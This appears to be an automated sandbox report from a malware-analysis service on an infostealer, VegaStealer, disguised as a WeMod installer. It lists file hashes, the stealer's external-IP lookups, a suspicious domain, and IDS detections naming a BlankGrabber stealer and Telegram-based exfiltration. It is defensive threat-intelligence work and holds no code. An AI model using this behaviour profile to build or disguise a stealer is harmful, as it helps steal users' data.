7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\_lzma.pydexecutable
MD5:4E2239ECE266230ECB231B306ADDE070
SHA256:34130D8ABE27586EE315262D69AF4E27429B7EAB1F3131EA375C2BB62CF094BE
7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\_hashlib.pydexecutable
MD5:F495D1897A1B52A2B15C20DCECB84B47
SHA256:E47E76D70D508B62924FE480F30E615B12FDD7745C0AAC68A2CDDABD07B692AE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
26
DNS requests
20
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7712
WeMod_Setup.exe
GET
200
142.250.185.67:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
7712
WeMod_Setup.exe
GET
200
142.250.185.67:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
7816
VegaStealer_v1.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7980
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7980
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7816
VegaStealer_v1.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5112
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
7712
WeMod_Setup.exe
104.22.43.75:443
api.wemod.com
CLOUDFLARENET
whitelisted
7712
WeMod_Setup.exe
142.250.185.67:80
c.pki.goog
GOOGLE
US
whitelisted
7816
VegaStealer_v1.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.184.206
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
api.wemod.com
  • 104.22.43.75
  • 104.22.42.75
  • 172.67.25.118
whitelisted
c.pki.goog
  • 142.250.185.67
whitelisted
vega-o9jcc.in
unknown
ip-api.com
  • 208.95.112.1
whitelisted
gstatic.com
  • 142.250.186.35
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted

Threats

PID
Process
Class
Message
7816
VegaStealer_v1.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
7816
VegaStealer_v1.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
7816
VegaStealer_v1.exe
A Network Trojan was detected
STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
2196
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2196
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
7816
VegaStealer_v1.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
WeMod-Setup.exe